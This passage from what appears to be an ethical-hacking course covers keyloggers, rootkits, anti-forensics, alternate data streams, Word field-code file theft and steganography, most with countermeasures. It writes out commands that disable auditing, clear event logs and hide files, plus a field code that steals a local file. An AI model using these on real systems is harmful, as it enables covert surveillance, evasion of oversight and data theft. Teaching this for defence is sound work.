The software tracks every keystroke entered on the keyboard, regardless of the application. It can be configured to alert the person who monitors the target computer via e-mail according to his monitoring preferences ” such as when certain keywords are received or typed, specific Web sites visited, or specific words typed in to any application.

Spector Pro has its limitations too. The solution does not recognize Microsoft Messenger and many other messenger clients. The attacker can retrieve keystrokes of one side of the chat however. By default, it does not capture data that is sent or received on unsupported clients. So also, if the target host uses a browser other than IE/Mozilla, they can run stealthily to the monitoring software. The mail-capture facility works with email clients like Outlook, Eudora, and most POP3/SMTP clients. However, it does not address web mail.

Hacking Tool: eBlaster (www.spector.com)

• eBlaster lets you know EXACTLY what your surveillance targets are doing on the internet even if you are thousands of miles away.

• eBlaster records their emails, chats, instant messages, websites visited and key strokes typed and then automatically sends this recorded information toy our own email address.

• Within seconds of them sending or receiving an email, you will receive your own copy of that email.

eBlaster will record BOTH sides of a conversation in the following chat and instant message programs: AOL chat rooms, AOL Instant Messenger, ICQ, MSN Messenger, Yahoo Messenger.

eBlaster will record every keystroke typed on the computer -- whether part of a chat conversation, an instant message, an email, a Word document, or even a password typed. The eBlaster Activity Report includes application the keystrokes were captured in, date and time the characters were captured and actual captured characters.

eBlaster does not show up as an icon, does not appear in the Windows system tray, does not appear in Windows Programs, does not show up in the Windows task list and cannot be uninstalled without the eBlaster password specified by the installer. It does not initiate connections to the internet and will only forward email and send activity reports when the monitored computer is already connected to the internet. eBlaster has a built-in e-mail client that will automatically send reports without using the host's normal e-mail program.

eBlaster has the power to act as a basic keystroke monitor and an intensive security surveillance system.

IKS Software Keylogger

In addition to a flexible and friendly keystroke log viewer, IKS is extremely configurable . For manual setup, an attacker needs to copy just one program file to the target computer and add two lines in system.ini file. He can then rename the log file, or even rename the program. Therefore, even an exhaustive hard drive search will find that the program exists

IKS has an internal memory buffer of 100 keystrokes. In order to increase performance of the system, the program will not dump the buffer to the disk until it is full or if the keyboard is idle for about three minutes with keystrokes in the buffer. When the system is shutting down, however, the program will dump the buffer immediately if there are any keystrokes in it.

Invisible Keylogger will record all clipboard text and save it for later viewing. This enables the user to see all text even text that has been cut and pasted in a browser, email, or anywhere . Invisible Keylogger will also record desktop activity at set intervals. The user can choose to have Invisible Keylogger only record activity if the target is present. Invisible Keylogger can be configured to clear all logs at set intervals as an added security measure. The user can export Invisible Keylogger's recorded logs into an easy to read HTML document for later viewing or records. Invisible Keylogger encrypts all logs files and protects them from being viewed.

Hacking Tool: Hardware Key Logger (www.keyghost.com)

• The Hardware Key Logger is a tiny hardware device that can be attached in between a keyboard and a computer.

• It keeps a record of all key strokes typed on the keyboard. The recording process is totally transparent to the end user.

The keystrokes can only be retrieved by an administrator with a proper password. The device can be installed even when the target computer is logged out, has a password, is locked or switched off. The device can be unplugged and the keystrokes retrieved on another computer.

Over 500,000 keystrokes can be stored with strong 128-bit encryption in non-volatile flash memory (same as in smart cards) that doesn't need batteries to retain storage. The device works on any desktop PC & all PC operating systems, including Windows 3.1, 95, 98, NT, 2000, Linux, OS/2, DOS, Sun Solaris and BeOS. No software installation is needed at all to record or retrieve keystrokes.

Recorded keystrokes can be played back into any text editor using proprietary 'keystroke ghosting' technique. The device plugs into computers with a small PS/2 keyboard plug or a large DIN plug. Unlike software keystroke recorders , KeyGhost records every keystroke, even those used to modify the BIOS before bootup. The greatest advantage is that it is impossible to detect or disable using software. One must visually scan the back of the computer where the keyboard is plugged in to detect its presence.

The only way to check for keystroke logging hardware is to familiarize with what it looks like and visually scan the machine on a regular basis. Taking pictures of the inside and outside of the machine may also be adopted. KeyGhost also makes keyboards with the key logger built straight in, which makes it much more difficult to spot.

Anti Spector (www.antispector.de)

• This tool will detect Spector and detect them from your system.

As there are two sides to every coin, the monitoring software has anti-monitoring software hounding after them. The detection process is similar to that of anti-virus software detecting a virus from its signature.

In combating software loggers, you can also take a virtual snapshot of the contents of your hard drive, as well as any alterations made by programs to other files. You must make a new snapshot each time you install new software or make system upgrades in order to keep it up to date. As well, you should store that "snapshot" file off your computer and in a private location so that it can't be altered by someone having physical or remote access to your machine. Products that take system snapshots include: Snapshot Spy Pro and ArkoSoft System Snapshot (for windows boxes). Fcheck is one of the more trusted programs out there for Linux machines - we're hoping one of you out there can tell us whether or not Fcheck runs on OSX as well.

There are a few programs out there specifically designed to detect keystroke logging software. Two that have received good reviews are Anti-keylogger and SpyCop. Neither of these programs is free, but Anti-keylogger does have a demo version that allows you to scan your machine for logging programs.

Hacking Tool: RootKit

What if the very code of the operating system came under the control of the attacker?

• The NT/2000 rootkit is built as a kernel mode driver which can be dynamically loaded at run time.

• The NT/2000 rootkit runs with system privileges, right at the core of the NT kernel, so it has access to all the resources of the operating system.

• The rootkit can also:

  • hide processes (that is, keep them from being listed)

  • hide files

  • hide registry entries

  • intercept keystrokes typed at the system console

  • issue a debug interrupt, causing a blue screen of death

  • redirect EXE files

Once an attacker has accessed the target system he may want to revisit the system for various reasons including using it as a launch pad for other nefarious activities. Naturally he would like to secure his base in a manner such that the probability of his detection is minimal. This is where a rootkit comes handy. As rightly pointed out, a rootkit is not used to achieve root, but to protect its use.

To facilitate continued access, a rootkit may disable auditing, edit event logs and circumvent IDS. The rootkit may be used by more than one attacker as it can allow anyone to log in based on backdoor password access and obtain administrator-level access to a computer or computer network.

As stated earlier, the execution paths may be modified or system binaries that replace the existing ones on the target system can be used so that attackers and the processes they run are invisible. On a UNIX system these can be minimum, core binaries such as ps, w, who, netstat, ls, find, and other binaries that can be used in monitoring server activity. It is not possible to detect these replacements on a first glance as most rootkits will mimic the creation dates and file sizes of the original system binaries while replacing them with infected versions.

The most effective rootkits are designed as device drivers because they provide the greatest control over the operating system for the purpose of hiding Trojans, D DOS tools, and altered data from change detection applications such as Intact and tripwire. Since they operate in kernel space they have full rein over virtually all system functions.

We will be looking at the NT rootkit here as Linux rootkits are referenced to in later modules. Apart from few differences in composition, the functionality and use of rootkits are similar across platforms. For instance consider some of the attacks that are possible by patching the NT kernel.

Planting the NT/2000 Rootkit

• The rootkit contains a kernel mode device driver, called _root_.sys and a launcher program, called deploy.exe

• After gaining access to the target system, he will copy _root_.sys and deploy.exe onto the target system and execute deploy.exe

• This will install the rootkit device driver and start it up. The attacker later deletes deploy.exe from the target machine.

• The attacker can then stop and restart the rootkit at will by using the commands net stop _root and net start _root_

• Once the rootkit is started, the file _root_.sys stops appearing in the directory listings. The rootkit intercepts the system calls for listing files and hides all files beginning with _root_ from display.

The kit can be considered as stealth as it does not show up on the netstat on Windows NT or 2000. This can be attributed to the rootkit's own TCP/IP stack implementation, which is stateless. So, how does it work around for remote connections? On a LAN, it works by determining the state of the connection based on the data within the incoming packet. For this reason also, the rootkit has a hardcoded IP address to which it will respond.

This default IP address is 10.0.0.166. Again, as the rootkit uses raw connections, it does not matter which port it uses on the target machine. The latest version (0.44) does not have a keyboard sniffer, though the earlier version (0.43) did. This makes it similar to the well known Trojans Sub seven and BO.

The rootkit hides its processes if the attacker wants it to. Any process that starts with '_root_' will be hidden. This can be done by toggling on/off 'hideproc' from the kernel-mode shell. Similarly, it can hide files and directories by toggling 'hidedir' from the kernel-mode shell. Processes that are named with a prefix of '_root_' are exempt from these rules.

The rootkit also demonstrates its capability to redirect execution paths. The latest build has an example of calc.exe being executed instead of any exe with a _root_ prefix. This does not affect the ability to read a particular file. The rootkit only becomes involved when the file is executed. In the registry, the rootkit is able to hide registry keys by identifying them with the _root_ prefix.

This lets the attacker view the hidden keys anyway. For instance, a copy of regedit.exe called '_root_regedit.exe' will be able to see all of the hidden keys. Here is a directory listing from a system, before and after the attacker activated the rootkit.

Rootkit Countermeasures

• Back up critical data (not binaries!) Wipe everything clean and reinstall OS/applications from trusted source.

• Don't rely on backups, because you could be restoring from trojaned software.

• Keep a well documented automated installation procedure.

• Keep availability of trusted restoration media.

What we have looked into is just a proof-of-concept tool. There are others out in the wild such as null.sys, hacker defender and many more that are not yet well researched. Of these "Slanret", "IERK," and "Backdoor-ALI" find mention in anti-virus products. Slanret is a rootkit component that comes with a backdoor program called "Krei" that listens on an open port and permits the remote access to the system. It is popular as a stealth device driver that accepts commands from the server instructing it on what files or processes to conceal.

In case you are on the reactive side, back up all the critical data excluding the binaries and go in for a fresh clean installation from a trusted source. You can do code checksumming as a good defense against tools like rootkits. MD5sum.exe can fingerprint files and note integrity violation when changes occur. The installation should preferably be automated and well documented. Trusted restoration media should be at hand always.

Another common trait of these rootkits discussed her are their dependency on device drivers. One quick check can be to boot up in safe mode with minimal device drivers and deprive the rootkit of its cloaking mechanism, making the files visible.

Covering Tracks

• Once intruders have successfully gained Administrator access on a system, they will try to cover the detection of their presence.

• When all the information of interest has been stripped from the target, they will install several back doors so that easy access can be obtained in the future.

Under the discussion on rootkits we saw how attackers try to remain undetected on the compromised system. One way of ensuring that they do not have to take the noisy way in, is to install backdoors that are password protected. This need not be restricted to a single backdoor. It is a known practice to have multiple Trojans and at least one Ethernet sniffer as part of the rootkit.

With the Ethernet sniffer, an attacker can sniff out authentication credentials and later use it to log in to the system and pass it off as a normal event. In Unix/Linux systems, the rootkit can have basic core utilities that can act as local system Trojans. One thing an attacker will like to see done is to have keep the system from ringing out any alarm bells .

Because the first thing a system administrator does to monitor unusual activity is to check the system log files, it is very common for intruders to use a utility to modify the system logs. In some extreme cases, rootkits can disable logging all together and discard all existing logs. This happens if the intruders intend to use the system for a longer time as a launch base for future intrusion activity. Then they will only remove those portions of logs that can reveal their presence.

Disabling Auditing

• First thing intruders will do after gaining Administrator privileges is to disable auditing.

• NT Resource Kit's auditpol.exe tool can disable auditing using command line.

• At the end of their stay, the intruders will just turn on auditing again using auditpol.exe

Windows auditing records certain events to the Event Log (or associated syslog). The log can be set to send alerts (email, pager, etc) to the system administrator. Therefore, the attacker will want to know the auditing status.

auditpol.exe is a part of the NT resource kit and can be used as a simple command line utility to find out the audit status of the target system and also to make changes to it.

The attacker will need to have the utility installed in the WINNT directory. He can then establish a null session to the target machine and run the command:

 C:\> auditpol \<ip address of target> 

This will reveal the current audit status of the system. He can choose to disable the auditing by:

 C :\> auditpol \<ip address of target> /disable 

This will make changes in the various logs that might register his actions. He can choose to hide the registry keys changed later on.

There are a number of reasons why auditing is important. These include:

• Successful attacks often preceded by a series of unsuccessful ones.

• Detecting an attack in its early phase can contain damage.

• Recovery often depends on realistic damage assessment.

• Auditing and intrusion detection helps determine causal factors/people for the attack.

• Assessing network compromise is dependant on auditing as well. One of the main goals of auditing is to identify the actions taken by attackers on your network. An attacker may attempt to compromise multiple computers and devices on the network.

Clearing the Event log

• Intruders can easily wipe out the logs in the event viewer

• Event viewer on the attackers host can open, read and clear logs of the remote host.

• This process will clear logs of all records but will leave one record stating that the event log has been cleared by 'Attacker'

We had mentioned that Event log ID 612 indicates that the audit policy on the system has been changed. Assuming that we have a well balanced audit policy, the various logs on the system can reveal a lot of information. However intruders can easily wipe out evidence in the event viewer by opening the logs of the remote host and clearing the entries. What happens when the event log itself is changed or deleted? An event log with a single entry is definitely a give away.

In the Security Log, always check on event IDs 529 "Unknown user or bad password," 680 "Account logon," and 517 "Security Log Cleared.

The following syntax is used by the dumpel.exe tool:

dumpel -f file [-s \\server] [-1 log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-d x] Where:

-f file. Specifies the file name for the output file. There is no default for -f, so you must specify the file.

-s server. Specifies the server for which you want to dump the event log. Leading backslashes on the server name are optional.

-1 log. Specifies which log (system, application, security) to dump. If an invalid log name is specified, the application log is dumped.

-m source. Specifies in which source (such as redirector (rdr), serial, and so on) to dump records. Only one source can be supplied. If this switch is not used, all events are dumped. If a source is used that is not registered in the registry, the application log is searched for records of this type.

-e n1 n2 n3. Filters for event ID nn (up to 10 can be specified). If the -r switch is not used, only records of these types are dumped; if -r is used, all records except records of these types are dumped. If this switch is not used, all events from the specified source name are selected. You cannot use this switch without the -m switch.

-r. Specifies whether to filter for specific sources or records, or to filter them out.

-t. Specifies that individual strings are separated by tabs. If -t is not used, strings are separated by spaces.

-d x. Dumps events for the past x days.

Tool: elsave.exe

• elsave.exe utility is a simple tool for clearing the event log. The following syntax will clear the security log on the remote server 'rovil' ( correct privileges are required on the remote system)

  

• Save the system log on the local machine to d:\system.log and then clear the log:

   elsave -1 system -F d:\system.log -C 

• Save the application log on \\serv1 to \\serv1 \d$\application.log:

   elsave -s \serv1 -F d:\application.log 

ELSave takes the following arguments:

Example:

Save the application log on \\serv1 to \\serv1\d$\application.log:

  elsave -s \ \serv1 -F d: \application.log  

Save the system log on the local machine to d: \system.log and then clear the log:

  elsave -l system -F d: \system.log -C  

Hacking Tool: WinZapper

• Wizapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000.

• To use the program, the attacker runs winzapper.exe and marks the event records to be deleted, then he presses 'delete events' and 'exit'. Presto the events disappear.

• To sum things up: after an attacker has gained Administrators access to the system, one simply cannot trust the security log!

No event is logged from the instance where WinZapper is started to the point where the system is rebooted. This simulates the behavior of an authorized user, who has audit privileges - except that here, it is not a user but a program that poses as one. This is possible because WinZapper works on a copy of the log file that will not become the "real" log file until the system is rebooted.

All the attacker has to do is to run winzapper.exe and mark the event records to be deleted. He can then press "Delete events and Exit" and reboot Windows to re-enable the event logging system. However, he cannot revisit the Event Viewer again before rebooting. Another possibility is to start Winzapper, and then commence with the attack. In this way, none of the events are logged even though eventlog is running - an interesting facility to any attacker.

WinZapper can only be used from an Administrators account, and consequently does not exploit any security vulnerability in Windows NT / 2000. Apart from this, the attacker can use WinZapper to erase individual event records in the security log. This way, he can hide his tracks and remain obscure. If he chooses to, the attacker can inject fake event records into the security log. For this, he must be able to execute the program with Administrative privileges.

WinZapper can be tweaked to work remotely like a client/server system as well, depending on the attacker's ingenuity. In effect, after an attacker has gained Administrators access to the system, the security log cannot be entirely trusted.

Evidence Eliminator

• Evidence Eliminator is an easy to use powerful and flexible data cleansing system for Windows PC.

• Daily use protects you from unwanted data becoming permanently hidden in your PC.

• It cleans recycle bins , Internet cache, system files, temp folders etc.

What brings this product into focus here is its ability to delete files such as windows SWAP file - the windows swap file provides virtual memory and is often filled with hidden evidence of all kinds; windows application logs; windows registry backups; deleted filenames with sizes and attributes from drive directory structures; free cluster space ("slack") from all file tips; magnetic remenance from underneath existing files/folders; all free unallocated space on all hard drives; evidence of activity in many other programs, using plug-in modules; slack space and deleted entries in the windows registry; created and modified dates and times on all files and folders and windows registry streams and instant deletes of windows registry data (NT4/2000/XP).

Hiding Files

• There are two ways of hiding files in NT/2000.

  1. Attrib

     • use attrib +h [file/directory]

  2. NTFS Alternate Data Streaming

     • NTFS files system used by Windows NT, 2000 and XP has a feature Alternate Data Streams - allow data to be stored in hidden files that are linked to a normal visible file.

  Streams are not limited in size and there can be more than one stream linked to a normal file.

File attributes consist of several fields. The first field describes whether a file is system, hidden, read-only, archive, or one of several less typical attributes. The second field describes the creation time, access time, write time, and the size of the file. The functions GetFileAttributesEx() and GetFileInformationByHandle() enable this.

ATTRIB.exe is used to display or change file attributes. It can be used by attackers to hide their files or even change the victim's file attributes.

Usage: ATTRIB [+ attribute - attribute] [pathname] [/S] key

• +: Turn an attribute ON

• -: Clear an attribute OFF

pathname: Drive and/or filename e.g. C: \*.txt

/S: Search the pathname including all subfolders .

attributes: H Hidden, S System, R Read-only, A Archive

If no attributes are specified during execution, attrib will return the current attribute settings. For example, to add the Hidden and System attributes for the test.txt file:

 ATTRIB +S +H TEST.TXT 

ATTRIB can be used with groups of files. It supports use of wildcards (? and *) with the filename parameter to display or change the attributes for a group of files. For example, to hide the directory C:\HIDE:

 ATTRIB +H C:\HIDE 

Creating Alternate Data Streams

• Start by going to the command line and typing notepad test.txt

• Put some data in the file, save the file, and close Notepad.

• From the command line, type dir test.txt and note the file size.

• Next, go to the command line and type notepad test.txt:hidden.txt Type some text into Notepad, save the file, and close.

• Check the file size again and notice that it hasn't changed!

• If you open test.txt, you see your original data and nothing else.

• If you use the type command on the filename from the command line, you still get the original data.

• If you go to the command line and type type test.txt:hidden.txt you get an error.

Alternate data streams are another type of named data stream that can be present within each file.

Let us try creating an alternate data stream.

1. In the lab, we invoke notepad from the command prompt by typing notepad ads.txt

2. We save our document after entering some data into it. We check its size using the dir command and note it.

3. We invoke notepad again from the command prompt by typing notepad ads.txt:hidden.txt (this is to hide the to-be-entered data). We type in the secret data and save the file. Once again we check the file size and note that it hasn't changed.

4. What has happened to the secret data that was input? On opening ads.txt we do not see the new data, but are able to see the old original data.

5. We return to the command prompt and type in ads.txt:hidden.txt

6. We are told that the filename or path is invalid or that the file does not exist.

Using cat reveals the following: c: \cat ads.txt - this is a normal data stream. c: \cat ads.txt:hidden.txt - this is a hidden data stream.

Now that we have a seen how alternate data streams are created, let us take a look at the security concerns.

Tools: ADS creation and detection

• makestrm.exe moves the physical contents of a file to its stream.

  

• ads_cat from Packet Storm is a utility for writing to NTFS's Alternate File Streams and includes ads_extract, ads_cp, and ads_rm, utilities to read, copy, and remove data from NTFS alternate file streams.

• Mark Russinovich at www.sysinternals.com has released freeware utility Streams which displays NTFS files that have alternate streams content.

• Heysoft has released LADS (List Alternate Data Streams), which scans the entire drive or a given directory. It lists the names and size of all alternate data streams it finds.

NTFS Streams countermeasures

• Deleting a stream file involves copying the 'front' file to a FAT partition, then copying back to NTFS.

• Streams are lost when the file is moved to FAT Partition.

• LNS.exe from

  (http://ntsecurity.nu/cgi-bin/download/lns.exe.pl) can detect streams.

 c:\ads>notepad myfile.txt:hidden 

When this command is executed, Notepad opens and asks if the user wishes to create a new file. This is strange because the ADS was created earlier. In order to observe the expected results enter the following commands:

 c:\ads>echo This is another ADS > myfile.txt:hidden.txt c:\ads>notepad myfile.txt:hidden.txt 

The same effects can be observed when the ADS is associated the directory listing, as in ":hidden.txt". The addition of the extension on the end of the filename allows the ADS to be opened in Notepad.

Other means include copying the cover file to a FAT partition and then moving them back. This corrupts and looses the streams.

Stealing Files using Word Documents

• Anyone who saves a word document has a potentially new security risk to consider - one that no current anti-virus or Trojan scanner will turn up.

• The contents of the files on victim's hard drives can be copied and sent outside your firewall without even their knowing.

• The threat takes advantage of a special feature of word called field codes.

• Here's how it might work: Someone sends victim a Word document with a field-code bug. The victim opens the file in Word, saves it (even with no changes), then sends it back to the originator.

Word and Excel provide a mechanism through which data from one document can be inserted to and updated in another document. This mechanism, known as field codes in Word and external updates in Excel, can be automated to reduce the amount of manual effort required by a user. An example of the use of Word field codes could be the automatic insertion of a standard disclaimer paragraph in a legal document. An example of the use of external updates in Excel could be the automatic updating of a chart in one spreadsheet using data in a different spreadsheet.

A vulnerability exists because it is possible to maliciously use field codes and external updates to steal information from a user without the user being aware. Certain events can trigger field code and external update to be updated, such as saving a document or by the user manually updating the links. Normally the user would be aware of these updates occurring; however a specially crafted field code or external update can be used to trigger an update without any indication to the user. This could enable an attacker to create a document that, when opened, would update itself to include the contents of a file from the user's local computer.

Field codes are markup codes that make it possible for dynamic content to be added to a document. For example, adding the {DATE} code to a document means that current date will be updated in the document whenever it is opened.

Inserting the following field structure into the footer of the last page will steal the contents of c:\sales.txt on the target computer

Let us see an example:

1. Alex sends Tom a Word document for revisions.

   Dear Tom,

   Please review the Pro-forma Purchase order for the material-101 at rate USD 2000 per unit. Kindly make appropriate corrections to the PO attached as word document and send it back to me ASAP for further actions.

   Regards,

   Alex

   {IF { INCLUDETEXT { IF{ DATE} = {DATE} "c:\Bonus.txt " "c:\Bonus.txt" } \* MERGEFORMAT } = " " " " \* MERGEFORMAT }

2. After Tom edits, saves and mails it back to Alex the file will also include contents of another file(s) from Tom's computer that Alex has specified.

3. To achieve this, Alex embeds the INCLUDETEXT field into the document. The field results in inclusion of a specified file into the current document.

4. Alex hides the field tag in the document by using hidden text, small white font, etc.

Field Code Counter measures

• Use Hidden Field Detector. It's available free at:

  http://www.woodyswatch.com/util/sniff/

• Hidden field Detector upon installation will install itself on your Word Tools Menu.

• It scans your documents for potentially troublesome field codes, which you cant see easily and even warns you when it finds something suspicious.

Mitigating factors:

The attacker would need to know the location of the file that he or she wanted to steal. If the correct filename were not presented, the attack would fail and an invalid field error message would be present in the document.

The user could always view the field codes or external updates. The field codes or external updates used in the attack can be revealed, as they are only hidden to prevent cluttering the document when it is being viewed or edited. A method of checking documents for additional undesired information is described in the Frequently Asked Questions below.

Although the attacker could take some steps to obscure the stolen information, the attacker would leave a clear audit trail. Since the field codes or external updates can be viewed, even if an attack is successful, the attacker would leave clear evidence in the document in the form of the stolen information and the malicious field codes used. This evidence could be used by law enforcement agencies if required

The vulnerability would not enable the attacker to delete, modify or add any files to the user's local system.

In virtually all circumstances, the attacker would need to entice the user into returning the document. No information would be revealed unless the user returned the document to the attacker.

What is Steganography?

• The process of hiding data in images is called Steganography.

• The most popular method for hiding data in files is to utilize graphic images as hiding place.

• Attackers can embed information such as:

  1. Source code for hacking tool

  2. List of compromised servers

  3. Plans for future attacks

  4. your grandma/s secret cookie recipe

It has been voiced that one of the shortcomings of various detection programs is their primary focus on streaming text data. What if an attacker bypasses normal surveillance techniques and still steals or transmits sensitive data? A typical situation would be where an attacker manages to get inside the firm as a temporary or contract employee and sneaks out sensitive information. While the organization may have a policy of not allowing electronic equipment into or to the outside from within, a determined attacker can still find a way with techniques such as Steganography.

The lure of a steganography technique is that unlike encryption, steganography cannot be detected. When transmitting an encrypted message it is evident that communication has occurred, even if the message cannot be read. Steganography is used to hide the very existence of the message. An attacker can use it to hide information even when encryption is not a feasible option. From a security point of view steganography can be used to hide a file in an encrypted file so that even if the encrypted file is deciphered, the hidden message is not seen.

There are several free software available for steganography on the Internet. Today, steganography has evolved into a digital strategy of hiding a file in some form of multimedia, such as an image, an audio file (like a .wav or mp3) or even a video file.

Tool: Image Hide

• ImageHide is a steganography program. Can Hide loads of text in images.

• Simple encrypt and decrypt of data

• Even after adding bytes of data, there is no increase in image size.

• Image looks the same to normal paint packages

• Loads and saves to files and gets past all the mail sniffers.

It is known that computers use binary format (zeros and ones) to represent text and graphics. The standard used for this is the ASCII standard. According to this, each character in the English language is represented using one parity bit and seven data bits. For example an uppercase "A" is represented by 1000001. Similarly, in digital context, an image can be represented by pixels. Each pixel contains information pertaining to the intensity of the three primary colors, red, green and blue. This information can be stored as a single byte (eight bits) or as three bytes (twenty-four bits). For example, in an eight bit image white is represented by the binary value of 11111111 and black is 00000000.

Let us get familiar with the terms related to steganography techniques. The term 'cover object' is used to refer to the carrier object such as image, document, sound file, etc. A steganographic tool (stego-tool) is used to break down the message to be embedded into the carrier into individual bits. Often these tools use password protection or other authentication phrase to let the receiver extract the message. This is referred to as the stego-key. The transformation of the secret message into a stego-object is thereby achieved.

We try our hand at Steganography with a freeware ImageHide available for download freely on the Internet at Dancemmammal.com.

ImageHide warns the user not to save the embedded image in JPEG format as data loss may occur. The basis of stating this is that of the three compression algorithms available for reducing image sizes, JPEG compression algorithm uses floating point calculations to translate the picture into an array of integers. This conversion process can result in rounding errors which may eliminate portions of the image. This process does not result in any notable difference in the image. Nevertheless, embedded data might get grossly damaged.

The other two popular algorithms, namely Windows Bitmap (BMP) and Graphic Interchange Format (GIF) are considered to use a "lossless" compression. The compressed image is an exact representation of the original.

In the example shown above, we note that when ImageHide calculates colors in the original cover object, it comes up with 577 colors. The stego-object on the other hand is calculated as having 594 colors. This brings us to the nature of these tools. There are two methods by which one can embed data into an image - using Image Domain tools or Transform Domain tools. The former are also known as Bit Wise Tools because they operate on the least significant bit (this can contain zeros and ones only) of the image. Here, the leftmost bit of each pixel in the image is dropped to accommodate one bit from the embedded message. This change will not be apparent in a high resolution image. This is again one of the reasons why high resolution images are preferred for use as cover images. However, in the case of grayscale images, this need not hold true.

Transform Domain tools are not affected by the cover image being in JPEG format because they adopt more complex algorithms such as the Discrete Cosine Transformation (DCT)* or wavelet transformation to embed information in key areas of the image. This category of tools can handle compression, cropping and image processing in a better manner. Examples are Outguess, SysCop.

Tool: Mp3Stego

• MP3Stego will hide information in MP3 files during the compression process.

• The data is first compressed, encrypted and then hidden in the MP3 bit stream.

We have seen how images are manipulated to hide information. Another media format gaining much attention is the MP3 audio format. We will look at the MP3Stego tool here. Before discussing the tool, let us see why MP3 is useful in Steganography.

Masking is a phenomenon in which one sound interferes with human perception of another sound. Frequency masking occurs when two tones close in frequency are played simultaneously. In this case, the louder tone will mask the quieter tone. Temporal masking occurs when a low-level signal is played immediately before or after a stronger one. MPEG audio compression techniques exploit these characteristics. It is possible to exploit these masking techniques by inserting marks that are just above the truncation threshold of MPEG but still below the threshold of perception.

Tool: Snow.exe

• Snow is a whitespace steganography program and is used to conceal messages in ASCII text by appending whitespace to the end of lines.

• Because spaces and tabs are generally not visible in text viewers , the message is effectively hidden from casual observers. If the built in encryption is used, the message cannot be read even if it is detected.

Snow is susceptible to these factors. The basic assumption of snow is that spaces and tabs are generally not visible in text viewers and therefore a message can be effectively hidden without affecting the text's visual representation from the casual observer. Encryption is provided using the ICE encryption algorithm in 1-bit cipher-feedback (CFB) mode. Because of ICE's arbitrary key size, passwords of any length up to 1170 characters are supported. snow takes advantage of the fact that since trailing spaces and tabs occasionally occur naturally, their existence will not be sufficient to immediately alert an observer who may stumble across them.

The snow program runs in two modes - message concealment , and message extraction. The data is concealed in the text file by appending sequences of up to 7 spaces, interspersed with tabs. This usually allows 3 bits to be stored every 8 columns. The start of the data is indicated by an appended tab character, which allows the insertion of mail and news headers without corrupting the data. snow provides rudimentary compression, using Huffman tables optimized for English text. However, if the data is not text, or if there is a lot of data, the use of an external compression program such as compress or gzip is recommended. If a message string or message file is specified on the command-line, snow attempts to conceal the message in the file 'infile' - if specified, or standard input otherwise. The resulting file will be written to 'outfile' - if specified, or standard output if not. If no message string is provided, snow attempts to extract a message from the input file. The result is written to the output file or standard output.

Tool: Camera/Shy

• Camera/Shy works with Windows and Internet Explorer and lets users share censored or sensitive information buried within an ordinary gif image.

• The program lets users encrypt text with a click of the mouse and bury the text in an image. The files can be password protected for further security.

• Viewers who open the pages with the Camera/Shy browser tool can then decrypt the embedded text on the fly by double-clicking on the image and supplying a password.

Camera/Shy is essentially a very simple steganography tool that allows users to encrypt information and hide it in standard GIF images. What makes this program different from most steganography tools is its ease of use - and hence a desirable component of a cracker's arsenal.

While other steganography programs are command line-based , Camera/Shy is embedded in a Web browser. Other programs require users to know beforehand that an image contains embedded content, but Camera/Shy allows users to check images for embedded messages, read them and embed their own return messages with the click of a mouse.

The Camera/Shy program allows Internet users to conceal information, viruses, or exploitative software inside graphic files on Web pages. Camera/Shy bypasses most known monitoring methods. Utilizing LSB steganographic techniques and AES -256 bit encryption, this application enables users to share censored information with their friends by hiding it in plain view as ordinary gif images. Moreover, it leaves no trace on the user's system. It allows one to make a web site C/S (Camera/Shy)-enabled and allows a reader to decrypt images from an HTML page on the fly.

Steganography Detection

• Stegdetect is an automated tool for detecting steganographic content in images.

• It is capable of detecting different steganographic methods to embed hidden information in JPEG images.

• Stegbreak is used to launch dictionary attacks against Jsteg-Shell, JPHide and OutGuess 0.13b.

The first step in steganalysis is to discover an image that is suspected of harboring a message. This is considered an "attack" on the hidden information. There are two other types of attacks against steganography. These are message attack and chosen-message attack. In the former, the steganalyst has a known hidden message the corresponding stego-image. The steganalyst determines patterns that arise from hiding the message and detects this. In the latter, the steganalyst creates a message using a known stego tool and analyses the difference in pattern.

The majority of stego-images do not reveal visual clues when compared with their cover image and thus require a more detailed analysis in order to determine that information has been concealed. The simplest signature is an increase in the file size between the stego-image and the cover image. Most of the other signatures manifest themselves in some form of manipulating the color palette of the cover image.

Once a stego-image has been discovered there are several steps that can be taken to disable or destroy the hidden message. Stego-images created with an Image Domain tool can be rendered useless by simply converting the image to a JPEG format. Image manipulation includes techniques such as: cropping, removing portions of the image; rotating the image; blurring, decreasing the contrast between pixels; sharpening, increasing the contrast between pixels ( opposite of blurring); adding or removing noise; resampling; converting between bit densities (gray scale, 8 bit, 24 bit); converting from digital to analog to digital (print the image then rescan it); adding bit wise messages; adding transform message.

Stegdetect is an automated tool for detecting steganographic content in images. It is capable of detecting several different steganographic methods to embed hidden information in JPEG images. Currently, the detectable schemes are

• jsteg,

• jphide (unix and windows),

• invisible secrets,

• outguess 01.3b,

• F5 (header analysis),

• appendX and camouflage.

Stegbreak is used to launch dictionary attacks against JSteg-Shell, JPHide and OutGuess 0.13b.

Tool: dskprobe.exe

Windows 2000 Installation CD-ROM

• dskprobe.exe is a low level disk editor located in Support Tools directory.

• Steps to read the efs temp contents:

  1. Launch dskprobe and open the physical drive to read.

  2. Click the Set Active button adjustment to the drive after it populates the handle '0'.

  3. Click Tools -> Search sectors and search for string efso.tmp (in sector 0 at the end of the disk).

  4. You should select Exhaustive Search, Ignore Case and Unicode characters.

This tool can help prepare for disk-based problems by saving critical disk structures before problems arise. Documenting and preserving these disk structures, such as the Master Boot Record (MBR) and boot sector, provides a fall-back in case of disk corruption. DiskProbe can also be used to resolve problems encountered . With it, the user can edit and repair these sectors on a byte-by-byte basis if corruption does occur.

DiskProbe and other sector editors function at a level "below" the file system, so the normal checks for maintaining disk consistency are not enforced. This tool gives the user direct access to every byte on the physical disk without regard to access privilege, which makes it possible to damage or permanently overwrite critical on-disk data structures.

DiskProbe uses no configuration files. The only change it makes to the registry is to register the shell type and default file name extension (.dsk).

dskprobe c:\mydir\sectoroo.dsk

This example runs DiskProbe and opens Sectoroo.dsk in the c: \mydir folder.

After the program has been run, double-clicking a file with the .dsk extension will start DiskProbe and load the file. DiskProbe cannot read the disk management database. That means users who upgrade their disks to dynamic disk will not be able to use all of the functionality of DiskProbe on those disks.

Buffer overflows

• A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with extra overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code:

• When the source is compiled and turned into a program and the program is run, it will assign a block of memory 32 bytes long to hold the name string.

